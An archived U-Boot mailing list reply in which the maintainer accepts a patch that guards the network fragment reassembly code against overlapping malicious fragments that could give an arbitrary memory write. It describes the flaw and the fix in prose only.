[PATCH 7/6] net: deal with fragment-overlapping-two-holes case

Tom Rini trini at konsulko.com
Mon Nov 28 20:52:03 CET 2022


On Mon, Oct 17, 2022 at 09:52:51AM +0200, Rasmus Villemoes wrote:

> With a suitable sequence of malicious packets, it's currently possible
> to get a hole descriptor to contain arbitrary attacker-controlled
> contents, and then with one more packet to use that as an arbitrary
> write vector.
> 
> While one could possibly change the algorithm so we instead loop over
> all holes, and in each hole puts as much of the current fragment as
> belongs there (taking care to carefully update the hole list as
> appropriate), it's not worth the complexity: In real, non-malicious
> scenarios, one never gets overlapping fragments, and certainly not
> fragments that would be supersets of one another.
> 
> So instead opt for this simple protection: Simply don't allow the
> eventual memcpy() to write beyond the last_byte of the current hole.
> 
> Signed-off-by: Rasmus Villemoes <rasmus.villemoes at prevas.dk>

Applied to u-boot/master, thanks!

-- 
Tom
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 659 bytes
Desc: not available
URL: <https://lists.denx.de/pipermail/u-boot/attachments/20221128/3bcae812/attachment.sig>


More information about the U-Boot mailing list